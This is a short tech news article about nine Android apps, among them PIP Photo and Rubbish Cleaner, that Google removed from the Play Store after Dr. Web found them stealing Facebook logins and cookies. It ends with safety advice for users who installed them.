Kyle Chua

Jul 7, 20212 min

Beware of These 9 Android Apps That Are Stealing Facebook Login Credentials

Updated: Aug 21, 2021

Google has kicked nine popular Android apps with a combined 5.8 million downloads off of the Google Play Store after researchers found that they were stealing users’ Facebook login credentials.

Credit: Dr. Web

On the surface, there doesn’t seem to be anything suspicious with the apps in question, providing fully functioning services that range from photo-editing tools, horoscope information, exercise guides and performance optimisation features. Cybersecurity firm Dr. Web, however, notes that it’s all part of the apps’ ploy to trick users into trusting them.

All of the malicious apps reportedly gave users the option to disable in-app ads by signing into Facebook. After which, they will be sent to a real Facebook sign-in page. From here, a JavaScript from a command server will be loaded to steal the login information before passing it to the app itself, which then passes it to the attackers.

Credit: Dr. Web

The apps also stole cookies from the authorised session. Cookies are blocks of data that contain information about users’ internet activities, preferences and settings, among others.

“Analysis of the malicious programs showed that they all received settings for stealing logins and passwords of Facebook accounts,” the researchers wrote. “However, the attackers could have easily changed the trojans’ settings and commanded them to load the web page of another legitimate service. They could have even used a completely fake login form located on a phishing site. Thus, the trojans could have been used to steal logins and passwords from any service.”

Dr. Web found 5 malware variants hidden within the 9 apps, but they are all said to be the same trojan using identical file formats and JavaScript code to steal data.

Here’s a list of the 9 apps that have been removed:

  1. PIP Photo

  2. Processing Photo

  3. Rubbish Cleaner

  4. Inwell Fitness

  5. Horoscope Daily

  6. App Lock Keep

  7. Lockit Master

  8. Horoscope Pi

  9. App Lock Manager

Credit: Dr. Web

The most popular among them is PIP Photo, which was accessed more than 5.8 million times before being taken down. In second place is Process Photo, which has amassed over 500,000 downloads. Meanwhile, Rubbish Cleaner, Inwell Fitness and Horoscope Daily all have more than 100,000 downloads.

A Google spokesperson told Ars Technica that on top of removing the apps, it has also banned the developers from the marketplace. This means that they will not be able to submit new apps for approval in the future. But this might not completely stop them as they can easily pay a one-time fee and create a new developer account under a different name.

Credit: Mika Baumeister / Unsplash

If you have downloaded or interacted with any of the aforementioned apps, be sure to check your device and your Facebook account for any signs of compromise. While you are at it, download an anti-virus software from trusted cybersecurity firms to help protect your device, if you haven’t yet.

Written by Kyle Chua